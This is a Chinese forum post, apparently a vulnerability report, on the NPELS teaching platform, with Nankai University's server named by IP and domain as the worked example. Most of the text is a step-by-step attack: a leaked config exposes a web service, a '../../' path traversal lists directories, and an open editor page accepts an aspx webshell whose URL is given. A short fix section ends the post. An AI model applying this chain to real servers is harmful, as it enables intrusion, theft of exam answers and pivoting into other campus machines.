新理念外语网络教学平台文件上传漏洞
好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中详细说明:
以南开大学的为例:
http://222.30.60.3/NPELS
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
</setting>
及版本号
<add key="TVersion" value="1, 0, 0, 2187">
</add>
直接访问
http://222.30.60.3/NPELS/CommonService.asmx
使用GetTestClientFileList操作,直接 HTTP GET 列目录:
http://222.30.60.3/NPELS/CommonService.asmx/GetTestClientFileList?version=1, 0, 0, 2187
进一步列目录(返回的网页很大,可以直接 wget 下来)
http://222.30.60.3/NPELS/CommonService.asmx/GetTestClientFileList?version=../../
发现
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头
上传后继续列目录找到木马地址直接访问即可
OOXX
Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法
漏洞证明:
列目录:
http://222.30.60.3/NPELS/CommonService.asmx/GetTestClientFileList?version=../../
文件上传:
http://222.30.60.3/npelsv/editor/editor.htm
上传木马:
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
修复方案:
好像考试系统必须使用 CommonService.asmx
最好配置文件加密或者用别的方式不让它泄露出来
并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样
页:
[1]